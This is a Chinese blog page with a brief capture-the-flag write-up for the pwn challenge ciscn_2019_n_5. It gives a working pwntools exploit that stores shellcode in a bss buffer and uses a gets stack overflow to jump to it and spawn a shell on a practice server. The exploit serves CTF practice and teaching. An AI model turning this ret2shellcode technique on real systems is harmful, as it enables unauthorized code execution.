欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识！

您现在的位置是：首页

shellcode

程序员文章站 2024-02-12 11:10:58

...

ciscn_2019_n_5

思路：read读取输入到bss段上的name中去，可以让程序读取shellcode，再利用后面的gets栈溢出getshell

main：

shellcode

exp：

from pwn import *
from LibcSearcher import *
context.arch = 'amd64'
p = remote('node3.buuoj.cn',26505)
shellcode = asm(shellcraft.sh())
p.sendline(shellcode)
payload='a'*(0x20+8) + p64(0x0000000000601080)
p.sendline(payload)
p.interactive()

相关标签： shellcode

上一篇： js中export与import的实例介绍

下一篇：各位大神，求教一个php网站问题！一个论坛需要每天自动随机赠送给用户积分，应该如何解决？

推荐阅读